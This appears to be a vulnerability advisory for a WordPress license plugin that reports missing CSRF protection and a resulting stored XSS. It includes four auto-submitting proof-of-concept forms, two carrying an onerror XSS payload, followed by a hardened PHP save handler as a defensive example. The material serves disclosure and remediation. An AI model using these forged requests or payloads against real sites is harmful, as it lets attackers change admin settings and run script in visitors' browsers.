The plugin does not perform any CSRF check when saving its settings, which could allow attackers to make a logged-in admin change them. Furthermore, because the plugin allows arbitrary HTML to be inserted in one of the settings, this could lead to a Stored XSS issue, which will be triggered in the frontend as well.
<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="acc_data[timeframe_1][duration]" value="0">
    <input type="text" name="acc_data[timeframe_1][key]" value="test">
    <input type="text" name="acc_data[timeframe_expire][key]" value="none">
    <input type="text" name="show_images" value="yes">
    <input type="text" name="acc_action" value="update_settings">
    <input type="text" name="acc_infinity" value="∞">
    <input type="text" name="submit" value="Update License Settings">
</form>
<script>
    HTMLFormElement.prototype.submit.call( document.getElementById("test") );
</script>

<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="acc_license[name]" value="test">
    <input type="text" name="acc_license[url]" value="">
    <input type="text" name="acc_license[image]" value="">
    <input type="text" name="acc_license[rdf]" value="--><img src=x onerror=alert(1)>">
    <input type="text" name="acc_action" value="edited">
    <input type="text" name="acc_license_key" value="test">
    <input type="text" name="submit" value="Save Changes">
</form>
<script>
    HTMLFormElement.prototype.submit.call( document.getElementById("test") );
</script>

<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="delete_license" value="Delete">
    <input type="text" name="acc_license_key" value="test2">
    <input type="text" name="acc_action" value="delete">
</form>
<script>
    document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="acc_license[name]" value="bbb">
    <input type="text" name="acc_license[url]" value="">
    <input type="text" name="acc_license[image]" value="">
    <input type="text" name="acc_license[rdf]" value="--><img src=x onerror=alert(1)>">
    <input type="text" name="acc_action" value="add">
    <input type="text" name="submit" value="Submit New License">
</form>
<script>
    HTMLFormElement.prototype.submit.call( document.getElementById("test") );
</script>
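A hardened save handler for the license requests shown above, as an added example that is not the plugin's own code or its actual fix. The `acc_*` field names come from the requests on this page; the function names, the nonce action and the option name `acc_example_licenses` are hypothetical, and storing the `rdf` value as plain text is an assumption.

```php
<?php
// Added example, not the plugin's code. acc_* field names are from the page;
// function names, nonce action and option name are hypothetical.
const ACC_NONCE_ACTION = 'acc_save_license';

// Printed inside the settings <form>: a hidden _wpnonce field tied to the
// current user and session, which a forged cross-site form cannot supply.
function acc_example_render_nonce() {
    wp_nonce_field( ACC_NONCE_ACTION );
}

function acc_example_handle_save() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['acc_action'] ) ) {
        return;
    }
    // Capability check first, then the CSRF token: check_admin_referer()
    // dies when _wpnonce is missing or invalid.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    check_admin_referer( ACC_NONCE_ACTION );

    $str    = static fn( $v ) => is_string( $v ) ? $v : ''; // reject nested arrays
    $action = sanitize_key( $str( wp_unslash( $_POST['acc_action'] ) ) );
    if ( ! in_array( $action, array( 'add', 'edited' ), true ) ) {
        return; // 'delete' and 'update_settings' need the same two checks
    }
    $raw = isset( $_POST['acc_license'] ) && is_array( $_POST['acc_license'] )
        ? wp_unslash( $_POST['acc_license'] ) : array();
    // Store each field in the form it is meant to have: plain text or URL.
    $license = array(
        'name'  => sanitize_text_field( $str( $raw['name'] ?? '' ) ),
        'url'   => esc_url_raw( $str( $raw['url'] ?? '' ) ),
        'image' => esc_url_raw( $str( $raw['image'] ?? '' ) ),
        'rdf'   => sanitize_textarea_field( $str( $raw['rdf'] ?? '' ) ), // strips tags
    );
    $key = sanitize_key( $str( wp_unslash( $_POST['acc_license_key'] ?? '' ) ) );
    if ( '' === $key ) { return; }
    $all         = (array) get_option( 'acc_example_licenses', array() );
    $all[ $key ] = $license;
    update_option( 'acc_example_licenses', $all );
}
add_action( 'admin_init', 'acc_example_handle_save' );

// Frontend output: escape again at the sink, whatever was stored.
function acc_example_render_rdf( array $license ) {
    return esc_html( $license['rdf'] ?? '' );
}
```

With the nonce check in place, the auto-submitting forms above fail before any option is written, and the `rdf` value is neutralised both on save and on output.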
Daniel Ruf
Daniel Ruf
Yes
2022-07-07 (about 11 months ago)
2022-07-07 (about 11 months ago)
2023-04-10 (about 1 months ago)